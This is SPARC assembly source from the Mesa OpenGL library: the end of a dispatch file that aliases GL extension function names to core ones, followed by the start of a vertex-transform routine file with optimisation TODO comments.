GL_STUB(gl_dispatch_stub_767, _gloffset__dispatch_stub_767)
GL_STUB(gl_dispatch_stub_768, _gloffset__dispatch_stub_768)
GL_STUB(gl_dispatch_stub_769, _gloffset__dispatch_stub_769)
.globl _mesa_sparc_glapi_end ; .type _mesa_sparc_glapi_end,#function
_mesa_sparc_glapi_end:
.globl glArrayElementEXT ; .type glArrayElementEXT,#function ; glArrayElementEXT = glArrayElement
.globl glBindTextureEXT ; .type glBindTextureEXT,#function ; glBindTextureEXT = glBindTexture
.globl glDrawArraysEXT ; .type glDrawArraysEXT,#function ; glDrawArraysEXT = glDrawArrays
#ifndef GLX_INDIRECT_RENDERING
.globl glAreTexturesResidentEXT ; .type glAreTexturesResidentEXT,#function ; glAreTexturesResidentEXT = glAreTexturesResident
#endif
.globl glCopyTexImage1DEXT ; .type glCopyTexImage1DEXT,#function ; glCopyTexImage1DEXT = glCopyTexImage1D
.globl glCopyTexImage2DEXT ; .type glCopyTexImage2DEXT,#function ; glCopyTexImage2DEXT = glCopyTexImage2D
.globl glCopyTexSubImage1DEXT ; .type glCopyTexSubImage1DEXT,#function ; glCopyTexSubImage1DEXT = glCopyTexSubImage1D
.globl glCopyTexSubImage2DEXT ; .type glCopyTexSubImage2DEXT,#function ; glCopyTexSubImage2DEXT = glCopyTexSubImage2D
#ifndef GLX_INDIRECT_RENDERING
.globl glDeleteTexturesEXT ; .type glDeleteTexturesEXT,#function ; glDeleteTexturesEXT = glDeleteTextures
#endif
#ifndef GLX_INDIRECT_RENDERING
.globl glGenTexturesEXT ; .type glGenTexturesEXT,#function ; glGenTexturesEXT = glGenTextures
#endif
.globl glGetPointervEXT ; .type glGetPointervEXT,#function ; glGetPointervEXT = glGetPointerv
#ifndef GLX_INDIRECT_RENDERING
.globl glIsTextureEXT ; .type glIsTextureEXT,#function ; glIsTextureEXT = glIsTexture
#endif
.globl glPrioritizeTexturesEXT ; .type glPrioritizeTexturesEXT,#function ; glPrioritizeTexturesEXT = glPrioritizeTextures
.globl glTexSubImage1DEXT ; .type glTexSubImage1DEXT,#function ; glTexSubImage1DEXT = glTexSubImage1D
.globl glTexSubImage2DEXT ; .type glTexSubImage2DEXT,#function ; glTexSubImage2DEXT = glTexSubImage2D
.globl glBlendColorEXT ; .type glBlendColorEXT,#function ; glBlendColorEXT = glBlendColor
.globl glBlendEquationEXT ; .type glBlendEquationEXT,#function ; glBlendEquationEXT = glBlendEquation
.globl glDrawRangeElementsEXT ; .type glDrawRangeElementsEXT,#function ; glDrawRangeElementsEXT = glDrawRangeElements
.globl glColorTableEXT ; .type glColorTableEXT,#function ; glColorTableEXT = glColorTable
#ifndef GLX_INDIRECT_RENDERING
.globl glGetColorTableEXT ; .type glGetColorTableEXT,#function ; glGetColorTableEXT = glGetColorTable
#endif
#ifndef GLX_INDIRECT_RENDERING
.globl glGetColorTableParameterfvEXT ; .type glGetColorTableParameterfvEXT,#function ; glGetColorTableParameterfvEXT = glGetColorTableParameterfv
#endif
#ifndef GLX_INDIRECT_RENDERING
.globl glGetColorTableParameterivEXT ; .type glGetColorTableParameterivEXT,#function ; glGetColorTableParameterivEXT = glGetColorTableParameteriv
#endif
.globl glTexImage3DEXT ; .type glTexImage3DEXT,#function ; glTexImage3DEXT = glTexImage3D
.globl glTexSubImage3DEXT ; .type glTexSubImage3DEXT,#function ; glTexSubImage3DEXT = glTexSubImage3D
.globl glCopyTexSubImage3DEXT ; .type glCopyTexSubImage3DEXT,#function ; glCopyTexSubImage3DEXT = glCopyTexSubImage3D
.globl glActiveTexture ; .type glActiveTexture,#function ; glActiveTexture = glActiveTextureARB
.globl glClientActiveTexture ; .type glClientActiveTexture,#function ; glClientActiveTexture = glClientActiveTextureARB
.globl glMultiTexCoord1d ; .type glMultiTexCoord1d,#function ; glMultiTexCoord1d = glMultiTexCoord1dARB
.globl glMultiTexCoord1dv ; .type glMultiTexCoord1dv,#function ; glMultiTexCoord1dv = glMultiTexCoord1dvARB
.globl glMultiTexCoord1f ; .type glMultiTexCoord1f,#function ; glMultiTexCoord1f = glMultiTexCoord1fARB
.globl glMultiTexCoord1fv ; .type glMultiTexCoord1fv,#function ; glMultiTexCoord1fv = glMultiTexCoord1fvARB
.globl glMultiTexCoord1i ; .type glMultiTexCoord1i,#function ; glMultiTexCoord1i = glMultiTexCoord1iARB
.globl glMultiTexCoord1iv ; .type glMultiTexCoord1iv,#function ; glMultiTexCoord1iv = glMultiTexCoord1ivARB
.globl glMultiTexCoord1s ; .type glMultiTexCoord1s,#function ; glMultiTexCoord1s = glMultiTexCoord1sARB
.globl glMultiTexCoord1sv ; .type glMultiTexCoord1sv,#function ; glMultiTexCoord1sv = glMultiTexCoord1svARB
.globl glMultiTexCoord2d ; .type glMultiTexCoord2d,#function ; glMultiTexCoord2d = glMultiTexCoord2dARB
.globl glMultiTexCoord2dv ; .type glMultiTexCoord2dv,#function ; glMultiTexCoord2dv = glMultiTexCoord2dvARB
.globl glMultiTexCoord2f ; .type glMultiTexCoord2f,#function ; glMultiTexCoord2f = glMultiTexCoord2fARB
.globl glMultiTexCoord2fv ; .type glMultiTexCoord2fv,#function ; glMultiTexCoord2fv = glMultiTexCoord2fvARB
.globl glMultiTexCoord2i ; .type glMultiTexCoord2i,#function ; glMultiTexCoord2i = glMultiTexCoord2iARB
.globl glMultiTexCoord2iv ; .type glMultiTexCoord2iv,#function ; glMultiTexCoord2iv = glMultiTexCoord2ivARB
.globl glMultiTexCoord2s ; .type glMultiTexCoord2s,#function ; glMultiTexCoord2s = glMultiTexCoord2sARB
.globl glMultiTexCoord2sv ; .type glMultiTexCoord2sv,#function ; glMultiTexCoord2sv = glMultiTexCoord2svARB
.globl glMultiTexCoord3d ; .type glMultiTexCoord3d,#function ; glMultiTexCoord3d = glMultiTexCoord3dARB
.globl glMultiTexCoord3dv ; .type glMultiTexCoord3dv,#function ; glMultiTexCoord3dv = glMultiTexCoord3dvARB
.globl glMultiTexCoord3f ; .type glMultiTexCoord3f,#function ; glMultiTexCoord3f = glMultiTexCoord3fARB
.globl glMultiTexCoord3fv ; .type glMultiTexCoord3fv,#function ; glMultiTexCoord3fv = glMultiTexCoord3fvARB
.globl glMultiTexCoord3i ; .type glMultiTexCoord3i,#function ; glMultiTexCoord3i = glMultiTexCoord3iARB
.globl glMultiTexCoord3iv ; .type glMultiTexCoord3iv,#function ; glMultiTexCoord3iv = glMultiTexCoord3ivARB
.globl glMultiTexCoord3s ; .type glMultiTexCoord3s,#function ; glMultiTexCoord3s = glMultiTexCoord3sARB
.globl glMultiTexCoord3sv ; .type glMultiTexCoord3sv,#function ; glMultiTexCoord3sv = glMultiTexCoord3svARB
.globl glMultiTexCoord4d ; .type glMultiTexCoord4d,#function ; glMultiTexCoord4d = glMultiTexCoord4dARB
.globl glMultiTexCoord4dv ; .type glMultiTexCoord4dv,#function ; glMultiTexCoord4dv = glMultiTexCoord4dvARB
.globl glMultiTexCoord4f ; .type glMultiTexCoord4f,#function ; glMultiTexCoord4f = glMultiTexCoord4fARB
.globl glMultiTexCoord4fv ; .type glMultiTexCoord4fv,#function ; glMultiTexCoord4fv = glMultiTexCoord4fvARB
.globl glMultiTexCoord4i ; .type glMultiTexCoord4i,#function ; glMultiTexCoord4i = glMultiTexCoord4iARB
.globl glMultiTexCoord4iv ; .type glMultiTexCoord4iv,#function ; glMultiTexCoord4iv = glMultiTexCoord4ivARB
.globl glMultiTexCoord4s ; .type glMultiTexCoord4s,#function ; glMultiTexCoord4s = glMultiTexCoord4sARB
.globl glMultiTexCoord4sv ; .type glMultiTexCoord4sv,#function ; glMultiTexCoord4sv = glMultiTexCoord4svARB
.globl glLoadTransposeMatrixd ; .type glLoadTransposeMatrixd,#function ; glLoadTransposeMatrixd = glLoadTransposeMatrixdARB
.globl glLoadTransposeMatrixf ; .type glLoadTransposeMatrixf,#function ; glLoadTransposeMatrixf = glLoadTransposeMatrixfARB
.globl glMultTransposeMatrixd ; .type glMultTransposeMatrixd,#function ; glMultTransposeMatrixd = glMultTransposeMatrixdARB
.globl glMultTransposeMatrixf ; .type glMultTransposeMatrixf,#function ; glMultTransposeMatrixf = glMultTransposeMatrixfARB
.globl glSampleCoverage ; .type glSampleCoverage,#function ; glSampleCoverage = glSampleCoverageARB
.globl glCompressedTexImage1D ; .type glCompressedTexImage1D,#function ; glCompressedTexImage1D = glCompressedTexImage1DARB
.globl glCompressedTexImage2D ; .type glCompressedTexImage2D,#function ; glCompressedTexImage2D = glCompressedTexImage2DARB
.globl glCompressedTexImage3D ; .type glCompressedTexImage3D,#function ; glCompressedTexImage3D = glCompressedTexImage3DARB
.globl glCompressedTexSubImage1D ; .type glCompressedTexSubImage1D,#function ; glCompressedTexSubImage1D = glCompressedTexSubImage1DARB
.globl glCompressedTexSubImage2D ; .type glCompressedTexSubImage2D,#function ; glCompressedTexSubImage2D = glCompressedTexSubImage2DARB
.globl glCompressedTexSubImage3D ; .type glCompressedTexSubImage3D,#function ; glCompressedTexSubImage3D = glCompressedTexSubImage3DARB
.globl glGetCompressedTexImage ; .type glGetCompressedTexImage,#function ; glGetCompressedTexImage = glGetCompressedTexImageARB
.globl glDisableVertexAttribArray ; .type glDisableVertexAttribArray,#function ; glDisableVertexAttribArray = glDisableVertexAttribArrayARB
.globl glEnableVertexAttribArray ; .type glEnableVertexAttribArray,#function ; glEnableVertexAttribArray = glEnableVertexAttribArrayARB
.globl glGetVertexAttribdv ; .type glGetVertexAttribdv,#function ; glGetVertexAttribdv = glGetVertexAttribdvARB
.globl glGetVertexAttribfv ; .type glGetVertexAttribfv,#function ; glGetVertexAttribfv = glGetVertexAttribfvARB
.globl glGetVertexAttribiv ; .type glGetVertexAttribiv,#function ; glGetVertexAttribiv = glGetVertexAttribivARB
.globl glProgramParameter4dNV ; .type glProgramParameter4dNV,#function ; glProgramParameter4dNV = glProgramEnvParameter4dARB
.globl glProgramParameter4dvNV ; .type glProgramParameter4dvNV,#function ; glProgramParameter4dvNV = glProgramEnvParameter4dvARB
.globl glProgramParameter4fNV ; .type glProgramParameter4fNV,#function ; glProgramParameter4fNV = glProgramEnvParameter4fARB
.globl glProgramParameter4fvNV ; .type glProgramParameter4fvNV,#function ; glProgramParameter4fvNV = glProgramEnvParameter4fvARB
.globl glVertexAttrib1d ; .type glVertexAttrib1d,#function ; glVertexAttrib1d = glVertexAttrib1dARB
.globl glVertexAttrib1dv ; .type glVertexAttrib1dv,#function ; glVertexAttrib1dv = glVertexAttrib1dvARB
.globl glVertexAttrib1f ; .type glVertexAttrib1f,#function ; glVertexAttrib1f = glVertexAttrib1fARB
.globl glVertexAttrib1fv ; .type glVertexAttrib1fv,#function ; glVertexAttrib1fv = glVertexAttrib1fvARB
.globl glVertexAttrib1s ; .type glVertexAttrib1s,#function ; glVertexAttrib1s = glVertexAttrib1sARB
.globl glVertexAttrib1sv ; .type glVertexAttrib1sv,#function ; glVertexAttrib1sv = glVertexAttrib1svARB
.globl glVertexAttrib2d ; .type glVertexAttrib2d,#function ; glVertexAttrib2d = glVertexAttrib2dARB
.globl glVertexAttrib2dv ; .type glVertexAttrib2dv,#function ; glVertexAttrib2dv = glVertexAttrib2dvARB
.globl glVertexAttrib2f ; .type glVertexAttrib2f,#function ; glVertexAttrib2f = glVertexAttrib2fARB
.globl glVertexAttrib2fv ; .type glVertexAttrib2fv,#function ; glVertexAttrib2fv = glVertexAttrib2fvARB
.globl glVertexAttrib2s ; .type glVertexAttrib2s,#function ; glVertexAttrib2s = glVertexAttrib2sARB
.globl glVertexAttrib2sv ; .type glVertexAttrib2sv,#function ; glVertexAttrib2sv = glVertexAttrib2svARB
.globl glVertexAttrib3d ; .type glVertexAttrib3d,#function ; glVertexAttrib3d = glVertexAttrib3dARB
.globl glVertexAttrib3dv ; .type glVertexAttrib3dv,#function ; glVertexAttrib3dv = glVertexAttrib3dvARB
.globl glVertexAttrib3f ; .type glVertexAttrib3f,#function ; glVertexAttrib3f = glVertexAttrib3fARB
.globl glVertexAttrib3fv ; .type glVertexAttrib3fv,#function ; glVertexAttrib3fv = glVertexAttrib3fvARB
.globl glVertexAttrib3s ; .type glVertexAttrib3s,#function ; glVertexAttrib3s = glVertexAttrib3sARB
.globl glVertexAttrib3sv ; .type glVertexAttrib3sv,#function ; glVertexAttrib3sv = glVertexAttrib3svARB
.globl glVertexAttrib4Nbv ; .type glVertexAttrib4Nbv,#function ; glVertexAttrib4Nbv = glVertexAttrib4NbvARB
.globl glVertexAttrib4Niv ; .type glVertexAttrib4Niv,#function ; glVertexAttrib4Niv = glVertexAttrib4NivARB
.globl glVertexAttrib4Nsv ; .type glVertexAttrib4Nsv,#function ; glVertexAttrib4Nsv = glVertexAttrib4NsvARB
.globl glVertexAttrib4Nub ; .type glVertexAttrib4Nub,#function ; glVertexAttrib4Nub = glVertexAttrib4NubARB
.globl glVertexAttrib4Nubv ; .type glVertexAttrib4Nubv,#function ; glVertexAttrib4Nubv = glVertexAttrib4NubvARB
.globl glVertexAttrib4Nuiv ; .type glVertexAttrib4Nuiv,#function ; glVertexAttrib4Nuiv = glVertexAttrib4NuivARB
.globl glVertexAttrib4Nusv ; .type glVertexAttrib4Nusv,#function ; glVertexAttrib4Nusv = glVertexAttrib4NusvARB
.globl glVertexAttrib4bv ; .type glVertexAttrib4bv,#function ; glVertexAttrib4bv = glVertexAttrib4bvARB
.globl glVertexAttrib4d ; .type glVertexAttrib4d,#function ; glVertexAttrib4d = glVertexAttrib4dARB
.globl glVertexAttrib4dv ; .type glVertexAttrib4dv,#function ; glVertexAttrib4dv = glVertexAttrib4dvARB
.globl glVertexAttrib4f ; .type glVertexAttrib4f,#function ; glVertexAttrib4f = glVertexAttrib4fARB
.globl glVertexAttrib4fv ; .type glVertexAttrib4fv,#function ; glVertexAttrib4fv = glVertexAttrib4fvARB
.globl glVertexAttrib4iv ; .type glVertexAttrib4iv,#function ; glVertexAttrib4iv = glVertexAttrib4ivARB
.globl glVertexAttrib4s ; .type glVertexAttrib4s,#function ; glVertexAttrib4s = glVertexAttrib4sARB
.globl glVertexAttrib4sv ; .type glVertexAttrib4sv,#function ; glVertexAttrib4sv = glVertexAttrib4svARB
.globl glVertexAttrib4ubv ; .type glVertexAttrib4ubv,#function ; glVertexAttrib4ubv = glVertexAttrib4ubvARB
.globl glVertexAttrib4uiv ; .type glVertexAttrib4uiv,#function ; glVertexAttrib4uiv = glVertexAttrib4uivARB
.globl glVertexAttrib4usv ; .type glVertexAttrib4usv,#function ; glVertexAttrib4usv = glVertexAttrib4usvARB
.globl glVertexAttribPointer ; .type glVertexAttribPointer,#function ; glVertexAttribPointer = glVertexAttribPointerARB
.globl glBindBuffer ; .type glBindBuffer,#function ; glBindBuffer = glBindBufferARB
.globl glBufferData ; .type glBufferData,#function ; glBufferData = glBufferDataARB
.globl glBufferSubData ; .type glBufferSubData,#function ; glBufferSubData = glBufferSubDataARB
.globl glDeleteBuffers ; .type glDeleteBuffers,#function ; glDeleteBuffers = glDeleteBuffersARB
.globl glGenBuffers ; .type glGenBuffers,#function ; glGenBuffers = glGenBuffersARB
.globl glGetBufferParameteriv ; .type glGetBufferParameteriv,#function ; glGetBufferParameteriv = glGetBufferParameterivARB
.globl glGetBufferPointerv ; .type glGetBufferPointerv,#function ; glGetBufferPointerv = glGetBufferPointervARB
.globl glGetBufferSubData ; .type glGetBufferSubData,#function ; glGetBufferSubData = glGetBufferSubDataARB
.globl glIsBuffer ; .type glIsBuffer,#function ; glIsBuffer = glIsBufferARB
.globl glMapBuffer ; .type glMapBuffer,#function ; glMapBuffer = glMapBufferARB
.globl glUnmapBuffer ; .type glUnmapBuffer,#function ; glUnmapBuffer = glUnmapBufferARB
.globl glBeginQuery ; .type glBeginQuery,#function ; glBeginQuery = glBeginQueryARB
.globl glDeleteQueries ; .type glDeleteQueries,#function ; glDeleteQueries = glDeleteQueriesARB
.globl glEndQuery ; .type glEndQuery,#function ; glEndQuery = glEndQueryARB
.globl glGenQueries ; .type glGenQueries,#function ; glGenQueries = glGenQueriesARB
.globl glGetQueryObjectiv ; .type glGetQueryObjectiv,#function ; glGetQueryObjectiv = glGetQueryObjectivARB
.globl glGetQueryObjectuiv ; .type glGetQueryObjectuiv,#function ; glGetQueryObjectuiv = glGetQueryObjectuivARB
.globl glGetQueryiv ; .type glGetQueryiv,#function ; glGetQueryiv = glGetQueryivARB
.globl glIsQuery ; .type glIsQuery,#function ; glIsQuery = glIsQueryARB
.globl glCompileShader ; .type glCompileShader,#function ; glCompileShader = glCompileShaderARB
.globl glGetActiveUniform ; .type glGetActiveUniform,#function ; glGetActiveUniform = glGetActiveUniformARB
.globl glGetShaderSource ; .type glGetShaderSource,#function ; glGetShaderSource = glGetShaderSourceARB
.globl glGetUniformLocation ; .type glGetUniformLocation,#function ; glGetUniformLocation = glGetUniformLocationARB
.globl glGetUniformfv ; .type glGetUniformfv,#function ; glGetUniformfv = glGetUniformfvARB
.globl glGetUniformiv ; .type glGetUniformiv,#function ; glGetUniformiv = glGetUniformivARB
.globl glLinkProgram ; .type glLinkProgram,#function ; glLinkProgram = glLinkProgramARB
.globl glShaderSource ; .type glShaderSource,#function ; glShaderSource = glShaderSourceARB
.globl glUniform1f ; .type glUniform1f,#function ; glUniform1f = glUniform1fARB
.globl glUniform1fv ; .type glUniform1fv,#function ; glUniform1fv = glUniform1fvARB
.globl glUniform1i ; .type glUniform1i,#function ; glUniform1i = glUniform1iARB
.globl glUniform1iv ; .type glUniform1iv,#function ; glUniform1iv = glUniform1ivARB
.globl glUniform2f ; .type glUniform2f,#function ; glUniform2f = glUniform2fARB
.globl glUniform2fv ; .type glUniform2fv,#function ; glUniform2fv = glUniform2fvARB
.globl glUniform2i ; .type glUniform2i,#function ; glUniform2i = glUniform2iARB
.globl glUniform2iv ; .type glUniform2iv,#function ; glUniform2iv = glUniform2ivARB
.globl glUniform3f ; .type glUniform3f,#function ; glUniform3f = glUniform3fARB
.globl glUniform3fv ; .type glUniform3fv,#function ; glUniform3fv = glUniform3fvARB
.globl glUniform3i ; .type glUniform3i,#function ; glUniform3i = glUniform3iARB
.globl glUniform3iv ; .type glUniform3iv,#function ; glUniform3iv = glUniform3ivARB
.globl glUniform4f ; .type glUniform4f,#function ; glUniform4f = glUniform4fARB
.globl glUniform4fv ; .type glUniform4fv,#function ; glUniform4fv = glUniform4fvARB
.globl glUniform4i ; .type glUniform4i,#function ; glUniform4i = glUniform4iARB
.globl glUniform4iv ; .type glUniform4iv,#function ; glUniform4iv = glUniform4ivARB
.globl glUniformMatrix2fv ; .type glUniformMatrix2fv,#function ; glUniformMatrix2fv = glUniformMatrix2fvARB
.globl glUniformMatrix3fv ; .type glUniformMatrix3fv,#function ; glUniformMatrix3fv = glUniformMatrix3fvARB
.globl glUniformMatrix4fv ; .type glUniformMatrix4fv,#function ; glUniformMatrix4fv = glUniformMatrix4fvARB
.globl glUseProgram ; .type glUseProgram,#function ; glUseProgram = glUseProgramObjectARB
.globl glValidateProgram ; .type glValidateProgram,#function ; glValidateProgram = glValidateProgramARB
.globl glBindAttribLocation ; .type glBindAttribLocation,#function ; glBindAttribLocation = glBindAttribLocationARB
.globl glGetActiveAttrib ; .type glGetActiveAttrib,#function ; glGetActiveAttrib = glGetActiveAttribARB
.globl glGetAttribLocation ; .type glGetAttribLocation,#function ; glGetAttribLocation = glGetAttribLocationARB
.globl glDrawBuffers ; .type glDrawBuffers,#function ; glDrawBuffers = glDrawBuffersARB
.globl glDrawBuffersATI ; .type glDrawBuffersATI,#function ; glDrawBuffersATI = glDrawBuffersARB
.globl glPointParameterf ; .type glPointParameterf,#function ; glPointParameterf = glPointParameterfEXT
.globl glPointParameterfARB ; .type glPointParameterfARB,#function ; glPointParameterfARB = glPointParameterfEXT
.globl glPointParameterfv ; .type glPointParameterfv,#function ; glPointParameterfv = glPointParameterfvEXT
.globl glPointParameterfvARB ; .type glPointParameterfvARB,#function ; glPointParameterfvARB = glPointParameterfvEXT
.globl glSecondaryColor3b ; .type glSecondaryColor3b,#function ; glSecondaryColor3b = glSecondaryColor3bEXT
.globl glSecondaryColor3bv ; .type glSecondaryColor3bv,#function ; glSecondaryColor3bv = glSecondaryColor3bvEXT
.globl glSecondaryColor3d ; .type glSecondaryColor3d,#function ; glSecondaryColor3d = glSecondaryColor3dEXT
.globl glSecondaryColor3dv ; .type glSecondaryColor3dv,#function ; glSecondaryColor3dv = glSecondaryColor3dvEXT
.globl glSecondaryColor3f ; .type glSecondaryColor3f,#function ; glSecondaryColor3f = glSecondaryColor3fEXT
.globl glSecondaryColor3fv ; .type glSecondaryColor3fv,#function ; glSecondaryColor3fv = glSecondaryColor3fvEXT
.globl glSecondaryColor3i ; .type glSecondaryColor3i,#function ; glSecondaryColor3i = glSecondaryColor3iEXT
.globl glSecondaryColor3iv ; .type glSecondaryColor3iv,#function ; glSecondaryColor3iv = glSecondaryColor3ivEXT
.globl glSecondaryColor3s ; .type glSecondaryColor3s,#function ; glSecondaryColor3s = glSecondaryColor3sEXT
.globl glSecondaryColor3sv ; .type glSecondaryColor3sv,#function ; glSecondaryColor3sv = glSecondaryColor3svEXT
.globl glSecondaryColor3ub ; .type glSecondaryColor3ub,#function ; glSecondaryColor3ub = glSecondaryColor3ubEXT
.globl glSecondaryColor3ubv ; .type glSecondaryColor3ubv,#function ; glSecondaryColor3ubv = glSecondaryColor3ubvEXT
.globl glSecondaryColor3ui ; .type glSecondaryColor3ui,#function ; glSecondaryColor3ui = glSecondaryColor3uiEXT
.globl glSecondaryColor3uiv ; .type glSecondaryColor3uiv,#function ; glSecondaryColor3uiv = glSecondaryColor3uivEXT
.globl glSecondaryColor3us ; .type glSecondaryColor3us,#function ; glSecondaryColor3us = glSecondaryColor3usEXT
.globl glSecondaryColor3usv ; .type glSecondaryColor3usv,#function ; glSecondaryColor3usv = glSecondaryColor3usvEXT
.globl glSecondaryColorPointer ; .type glSecondaryColorPointer,#function ; glSecondaryColorPointer = glSecondaryColorPointerEXT
.globl glMultiDrawArrays ; .type glMultiDrawArrays,#function ; glMultiDrawArrays = glMultiDrawArraysEXT
.globl glMultiDrawElements ; .type glMultiDrawElements,#function ; glMultiDrawElements = glMultiDrawElementsEXT
.globl glFogCoordPointer ; .type glFogCoordPointer,#function ; glFogCoordPointer = glFogCoordPointerEXT
.globl glFogCoordd ; .type glFogCoordd,#function ; glFogCoordd = glFogCoorddEXT
.globl glFogCoorddv ; .type glFogCoorddv,#function ; glFogCoorddv = glFogCoorddvEXT
.globl glFogCoordf ; .type glFogCoordf,#function ; glFogCoordf = glFogCoordfEXT
.globl glFogCoordfv ; .type glFogCoordfv,#function ; glFogCoordfv = glFogCoordfvEXT
.globl glBlendFuncSeparate ; .type glBlendFuncSeparate,#function ; glBlendFuncSeparate = glBlendFuncSeparateEXT
.globl glWindowPos2d ; .type glWindowPos2d,#function ; glWindowPos2d = glWindowPos2dMESA
.globl glWindowPos2dARB ; .type glWindowPos2dARB,#function ; glWindowPos2dARB = glWindowPos2dMESA
.globl glWindowPos2dv ; .type glWindowPos2dv,#function ; glWindowPos2dv = glWindowPos2dvMESA
.globl glWindowPos2dvARB ; .type glWindowPos2dvARB,#function ; glWindowPos2dvARB = glWindowPos2dvMESA
.globl glWindowPos2f ; .type glWindowPos2f,#function ; glWindowPos2f = glWindowPos2fMESA
.globl glWindowPos2fARB ; .type glWindowPos2fARB,#function ; glWindowPos2fARB = glWindowPos2fMESA
.globl glWindowPos2fv ; .type glWindowPos2fv,#function ; glWindowPos2fv = glWindowPos2fvMESA
.globl glWindowPos2fvARB ; .type glWindowPos2fvARB,#function ; glWindowPos2fvARB = glWindowPos2fvMESA
.globl glWindowPos2i ; .type glWindowPos2i,#function ; glWindowPos2i = glWindowPos2iMESA
.globl glWindowPos2iARB ; .type glWindowPos2iARB,#function ; glWindowPos2iARB = glWindowPos2iMESA
.globl glWindowPos2iv ; .type glWindowPos2iv,#function ; glWindowPos2iv = glWindowPos2ivMESA
.globl glWindowPos2ivARB ; .type glWindowPos2ivARB,#function ; glWindowPos2ivARB = glWindowPos2ivMESA
.globl glWindowPos2s ; .type glWindowPos2s,#function ; glWindowPos2s = glWindowPos2sMESA
.globl glWindowPos2sARB ; .type glWindowPos2sARB,#function ; glWindowPos2sARB = glWindowPos2sMESA
.globl glWindowPos2sv ; .type glWindowPos2sv,#function ; glWindowPos2sv = glWindowPos2svMESA
.globl glWindowPos2svARB ; .type glWindowPos2svARB,#function ; glWindowPos2svARB = glWindowPos2svMESA
.globl glWindowPos3d ; .type glWindowPos3d,#function ; glWindowPos3d = glWindowPos3dMESA
.globl glWindowPos3dARB ; .type glWindowPos3dARB,#function ; glWindowPos3dARB = glWindowPos3dMESA
.globl glWindowPos3dv ; .type glWindowPos3dv,#function ; glWindowPos3dv = glWindowPos3dvMESA
.globl glWindowPos3dvARB ; .type glWindowPos3dvARB,#function ; glWindowPos3dvARB = glWindowPos3dvMESA
.globl glWindowPos3f ; .type glWindowPos3f,#function ; glWindowPos3f = glWindowPos3fMESA
.globl glWindowPos3fARB ; .type glWindowPos3fARB,#function ; glWindowPos3fARB = glWindowPos3fMESA
.globl glWindowPos3fv ; .type glWindowPos3fv,#function ; glWindowPos3fv = glWindowPos3fvMESA
.globl glWindowPos3fvARB ; .type glWindowPos3fvARB,#function ; glWindowPos3fvARB = glWindowPos3fvMESA
.globl glWindowPos3i ; .type glWindowPos3i,#function ; glWindowPos3i = glWindowPos3iMESA
.globl glWindowPos3iARB ; .type glWindowPos3iARB,#function ; glWindowPos3iARB = glWindowPos3iMESA
.globl glWindowPos3iv ; .type glWindowPos3iv,#function ; glWindowPos3iv = glWindowPos3ivMESA
.globl glWindowPos3ivARB ; .type glWindowPos3ivARB,#function ; glWindowPos3ivARB = glWindowPos3ivMESA
.globl glWindowPos3s ; .type glWindowPos3s,#function ; glWindowPos3s = glWindowPos3sMESA
.globl glWindowPos3sARB ; .type glWindowPos3sARB,#function ; glWindowPos3sARB = glWindowPos3sMESA
.globl glWindowPos3sv ; .type glWindowPos3sv,#function ; glWindowPos3sv = glWindowPos3svMESA
.globl glWindowPos3svARB ; .type glWindowPos3svARB,#function ; glWindowPos3svARB = glWindowPos3svMESA
.globl glBindProgramARB ; .type glBindProgramARB,#function ; glBindProgramARB = glBindProgramNV
.globl glDeleteProgramsARB ; .type glDeleteProgramsARB,#function ; glDeleteProgramsARB = glDeleteProgramsNV
.globl glGenProgramsARB ; .type glGenProgramsARB,#function ; glGenProgramsARB = glGenProgramsNV
.globl glGetVertexAttribPointerv ; .type glGetVertexAttribPointerv,#function ; glGetVertexAttribPointerv = glGetVertexAttribPointervNV
.globl glGetVertexAttribPointervARB ; .type glGetVertexAttribPointervARB,#function ; glGetVertexAttribPointervARB = glGetVertexAttribPointervNV
.globl glIsProgramARB ; .type glIsProgramARB,#function ; glIsProgramARB = glIsProgramNV
.globl glPointParameteri ; .type glPointParameteri,#function ; glPointParameteri = glPointParameteriNV
.globl glPointParameteriv ; .type glPointParameteriv,#function ; glPointParameteriv = glPointParameterivNV
.globl glBlendEquationSeparate ; .type glBlendEquationSeparate,#function ; glBlendEquationSeparate = glBlendEquationSeparateEXT
|
AIFM-sys/AIFM
| 34,643
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/sparc/xform.S
|
/* $Id: xform.S,v 1.1.1.1 2012/03/29 17:22:11 uid42307 Exp $ */
/* TODO
*
* 1) It would be nice if load/store double could be used
* at least for the matrix parts. I think for the matrices
* it is safe, but for the vertices it probably is not due to
* things like glInterleavedArrays etc.
*
* UPDATE: Trying this now in sparc_matrix.h -DaveM_990624
*
* 2) One extremely slick trick would be if we could enclose
* groups of xform calls on the same vertices such that
* we just load the matrix into f16-->f31 before the calls
* and then we would not have to do them here. This may be
* tricky and not much of a gain though.
*/
#include "sparc_matrix.h"
#if defined(SVR4) || defined(__SVR4) || defined(__svr4__)
/* Solaris requires this for 64-bit. */
.register %g2, #scratch
.register %g3, #scratch
#endif
.text
.align 64
__set_v4f_1:
ld [%o0 + V4F_FLAGS], %g2
mov 1, %g1
st %g1, [%o0 + V4F_SIZE]
or %g2, VEC_SIZE_1, %g2
retl
st %g2, [%o0 + V4F_FLAGS]
__set_v4f_2:
ld [%o0 + V4F_FLAGS], %g2
mov 2, %g1
st %g1, [%o0 + V4F_SIZE]
or %g2, VEC_SIZE_2, %g2
retl
st %g2, [%o0 + V4F_FLAGS]
__set_v4f_3:
ld [%o0 + V4F_FLAGS], %g2
mov 3, %g1
st %g1, [%o0 + V4F_SIZE]
or %g2, VEC_SIZE_3, %g2
retl
st %g2, [%o0 + V4F_FLAGS]
__set_v4f_4:
ld [%o0 + V4F_FLAGS], %g2
mov 4, %g1
st %g1, [%o0 + V4F_SIZE]
or %g2, VEC_SIZE_4, %g2
retl
st %g2, [%o0 + V4F_FLAGS]
/* First the raw versions. */
.globl _mesa_sparc_transform_points1_general
_mesa_sparc_transform_points1_general:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_1_2_3_12_13_14_15(%o1)
cmp %g3, 1
st %g3, [%o0 + V4F_COUNT]
bl 3f
clr %o1
be 2f
andn %g3, 1, %o2
1: ld [%g1 + 0x00], %f0 ! LSU Group
add %g1, %o5, %g1 ! IEU0
ld [%g1 + 0x00], %f8 ! LSU Group
add %o1, 2, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f1 ! FGM Group 1-cycle stall on %f0
fmuls %f0, M1, %f2 ! FGM Group
fmuls %f0, M2, %f3 ! FGM Group
fmuls %f0, M3, %f4 ! FGM Group
